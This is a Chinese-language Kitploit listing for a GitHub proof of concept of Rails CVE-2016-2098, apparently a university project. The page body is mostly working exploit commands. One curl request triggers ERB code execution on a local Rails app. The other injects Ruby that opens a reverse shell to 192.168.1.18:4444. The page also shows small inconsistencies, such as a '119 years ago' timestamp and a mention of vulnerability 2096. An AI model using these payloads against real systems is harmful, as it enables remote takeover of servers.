Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
rails-PoC-CVE-2016-2098 — 概念验证 CVE-2016-2098 | Kitploit
工具/GitHubGitHub/alejandro-marting/rails-poc-cve-2016-2098
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubalejandro-marting/rails-poc-cve-2016-2098

rails-PoC-CVE-2016-2098

概念验证 CVE-2016-2098

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
119年前尚未审核
分享

漏洞CVE-2016-2098的概念验证

由 @alejandro-marting 创建的大学项目, 我们可以在其中检查漏洞2096

使用:

  • rails 4.2.5.1
  • 视图包含易受攻击的代码 app/views/poc/render1.html.erb

![] (https://github.com/Alejandro-MartinG/rails-PoC-CVE-2016-2098/blob/master/app/assets/images/Captura%20de%20pantalla%20de%202017-01-15%2009:50:23.png)

执行:

首先我们需要使用以下命令运行 Rails 服务器:

$ rvmsudo rails server -b 0.0.0.0 -p 80

现在我们可以通过以下命令触发远程代码执行:

$ curl 'localhost:3000/poc/render1?template\[inline\]=<%25%3DFileUtils.touch+"rooted"%25>'

(应该会生成一个 rooted 文件)

如果你想尝试通过 Ruby 代码注入实现反向 shell,可以运行以下命令:

$ curl -H "Content-type: application/json" -X GET -d ' {"template" : {
"inline" : "<%= require \'socket\';exit if
fork;c=TCPSocket.new(\"192.168.1.18\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print
io.read}end %>"}}'  http://localhost:3000/poc/render1

如有任何问题,请与我联系!

下载工具